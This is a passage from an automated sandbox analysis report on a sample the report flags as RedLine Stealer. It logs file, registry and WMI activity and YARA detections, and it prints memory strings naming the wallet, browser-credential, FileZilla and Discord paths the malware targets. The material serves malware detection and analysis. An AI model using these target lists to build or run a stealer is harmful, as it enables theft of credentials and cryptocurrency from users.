                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Users\user\Desktop\PZNfhfaj9O.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Users\user\AppData\Roaming\CiENBY.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Users\user\AppData\Roaming\CiENBY.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1993766836.00000000077D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7204, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7728, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $tq1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: PZNfhfaj9O.exe, 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $tq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7204, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7728, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e42720.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3ef3958.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e2a900.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3edbb38.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.PZNfhfaj9O.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3ef3958.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CiENBY.exe.3edbb38.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e42720.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PZNfhfaj9O.exe.3e2a900.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
